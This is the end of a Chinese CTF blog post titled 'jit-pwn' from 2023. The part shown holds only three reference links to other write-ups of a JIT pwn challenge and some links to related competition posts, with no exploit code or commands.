<p><a target="_blank" rel="noopener" href="https://blog.wingszeng.top/2023-xhlj-pwn-jit/">https://blog.wingszeng.top/2023-xhlj-pwn-jit/</a></p>
<p><a target="_blank" rel="noopener" href="https://roderickchan.github.io/zh-cn/2023-02-02-2023%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%91%E5%88%9D%E8%B5%9Bpwn-jit/">https://roderickchan.github.io/zh-cn/2023-02-02-2023%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%91%E5%88%9D%E8%B5%9Bpwn-jit/</a></p>
<p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/hpLSfXtc1pYPtvz3734iLA">https://mp.weixin.qq.com/s/hpLSfXtc1pYPtvz3734iLA</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E7%9F%A5%E8%AF%86%E7%82%B9%E6%80%BB%E7%BB%93/" class="category-chain-item">知识点总结</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/pwn/">#pwn</a>
      
        <a href="/tags/jit/">#jit</a>
      
        <a href="/tags/%E7%9F%A5%E8%AF%86%E7%82%B9%E6%80%BB%E7%BB%93/">#知识点总结</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>jit-pwn</div>
      <div>http://example.com/2023/08/23/jit-pwn/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>l1s00t</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年8月23日</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>更新于</div>
          <div>2023年8月28日</div>
        </div>
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/08/24/2023-wmctf-pwn%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0/" title="2023-wmctf-pwn部分复现">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">2023-wmctf-pwn部分复现</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/08/01/2023-starctf%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/" title="2023-*ctf部分复现-pwn">
                        <span class="hidden-mobile">2023-*ctf部分复现-pwn</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      

    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    
  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
